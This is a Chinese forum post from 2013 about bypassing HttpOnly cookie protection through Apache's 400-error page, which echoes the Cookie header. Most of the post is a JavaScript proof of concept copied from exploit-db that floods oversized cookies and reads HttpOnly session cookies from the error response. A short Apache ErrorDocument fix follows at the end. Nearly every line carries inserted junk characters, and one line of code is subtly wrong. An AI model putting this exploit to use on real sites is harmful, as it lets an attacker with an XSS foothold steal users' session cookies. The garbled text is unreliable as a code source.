很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。: z( T7 \* E8 v5 u
# h# F7 V5 j; [# N& B! I: @
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:) D' F$ m8 @$ G: c6 K- O2 x) K
: S1 ]& U, \$ C8 c; x) A+ r- m" y
// http://www.exploit-db.com/exploits/18442/
! V9 ?5 _: o3 cfunction setCookies (good) {- s, G2 \! x# V6 J4 J5 {
// Construct string for cookie value
, b! Z8 X% y0 o7 I7 svar str = "";% P* R0 a! c s9 C/ U) [
for (var i=0; i< 819; i++) {9 x* Q: _, c% N5 W$ @! v
str += "x";
) y* V) J. ]4 ]* P. h1 l}: z7 S7 ?) h& S. I6 ]
// Set cookies
3 n* o4 H2 c/ g3 Yfor (i = 0; i < 10; i++) {
# j* O! U) E9 C7 Q$ `* v, l// Expire evil cookie
" @! V" _* @ Q; |) Cif (good) {
* l6 z3 h8 k5 H( A( Yvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";9 Q7 p" G/ h0 P* {* \7 A6 I/ [
}
e/ ^* V8 t6 O+ {// Set evil cookie4 n9 H* s9 Q1 u* k' @
else {
! j3 F; W1 P3 ^7 cvar cookie = "xss"+i+"="+str+";path=/";5 x5 d* j! k7 V- p( D5 d; l
}
; Q4 d8 s; ~1 \2 E) ]: o% gdocument.cookie = cookie;; y. C+ b$ c8 |# q; G! D# |! g
}+ I N8 s# B' P* R6 O0 H( H. \0 F* V& |5 h
}& ? D5 q8 o5 O
function makeRequest() {$ T3 p h: `: q( ?/ v. _
setCookies();- v5 R8 g+ `* @, N/ R0 D
function parseCookies () {: m, s2 i3 x' x% S8 Q
var cookie_dict = {};
! k. Z6 j* G" Y5 ]// Only react on 400 status
1 @. I& R8 R+ g. e* r+ T# C8 _if (xhr.readyState === 4 && xhr.status === 400) {$ h" _7 K) P* u# M q3 j
// Replace newlines and match <pre> content. E( V$ V; O5 v
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);, }2 y% P) P$ p+ ]
if (content.length) {4 ]3 r1 O+ Y& d
// Remove Cookie: prefix
, y: J' r9 G: P- F/ _; _content = content[1].replace("Cookie: ", "");
+ t1 G5 t' p. k3 |: {- Ovar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);5 q/ J. k, e) A8 p; ?* Q; X. v
// Add cookies to object
6 f( J- ^7 I+ W' O6 t: a# Vfor (var i=0; i<cookies.length; i++) {* z5 j& Y5 A, m- B
var s_c = cookies.split('=',2);
" J. X2 L! B3 E6 Q$ e5 S. tcookie_dict[s_c[0]] = s_c[1];$ N+ w# b: S; `. p P
}. B& g) A; b& {7 M
}; N4 y y% F% K9 c6 g
// Unset malicious cookies7 y* T( _. {) B1 m* ] b
setCookies(true);
, t5 K5 X5 d2 k& M5 [8 d" Ualert(JSON.stringify(cookie_dict));
7 X! ?- Z) |+ d' Z' Z9 c6 W}. E- m3 \# L8 ~9 F6 V8 t: ]
}
' e$ n. k3 P5 }. f0 K// Make XHR request
. b0 z8 O, C4 k, evar xhr = new XMLHttpRequest();
0 s2 F# J( e- f" ixhr.onreadystatechange = parseCookies;
: ^8 ^, }" j3 H( Ixhr.open("GET", "/", true);
/ i& }+ D, d$ X0 b& c5 zxhr.send(null);! x$ C1 g0 U) D2 D
}
" G7 w9 a) ~0 C8 e2 FmakeRequest();$ h' r, R0 S4 q6 u
, V( ?7 {4 H6 D0 A- ~1 h6 a0 B
你就能看见华丽丽的400错误包含着cookie信息。. T) f6 b" @( z2 N# c( r5 D
! g( i& k& _6 L$ z. R+ ^: s' `
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#. I' ?4 p% Q0 y, o
& K2 U8 e0 V/ K l1 |5 r0 Z修复方案:: N* C2 m: P5 j7 i" u7 \
, O2 u' @' V/ S# I2 l3 {
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下- ^! Q% P# C4 W( N# u* C
, ^, k! E- F1 y. y5 D. _7 IIn the event of a problem or error, Apachecan be configured to do one of four things,
N% c; v: X: R! M, F C7 |( W% a0 G) o5 H: `
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息+ ? X" S; H, F+ I4 s
2. output acustomized message输出一段信息
6 O& v j( }- _ [3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
/ }8 i$ T+ x& F: x# t) H4. redirect to an external URL to handle theproblem/error转向一个外部URL3 P2 w4 \2 d; I) g' ?$ Q
' x) _/ m% G3 p9 P* P: w; b# g8 I经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
' _8 C0 m9 J: |7 h: _2 A$ R6 Q- @ F+ p( P+ g, g# ~
Apache配置:8 A3 n% u7 |$ e, e3 ]! K' ]
+ k. [0 x4 o4 |3 m2 Z; V& T! MErrorDocument400 " security test"
" u4 I. S6 m2 N' s( o: `9 C* `8 B8 O+ Y
当然,升级apache到最新也可:)。
/ u2 @. V, H f3 ]: l
7 v7 ]. K3 i' Q$ p9 @# `0 I参考:http://httpd.apache.org/security/vulnerabilities_22.html6 h& [8 Z8 ]& d6 p
( i) e4 e4 C( R& B. w) _ p! M4 r
|
发表于 2013-4-19 19:15:43
收藏
支持
反对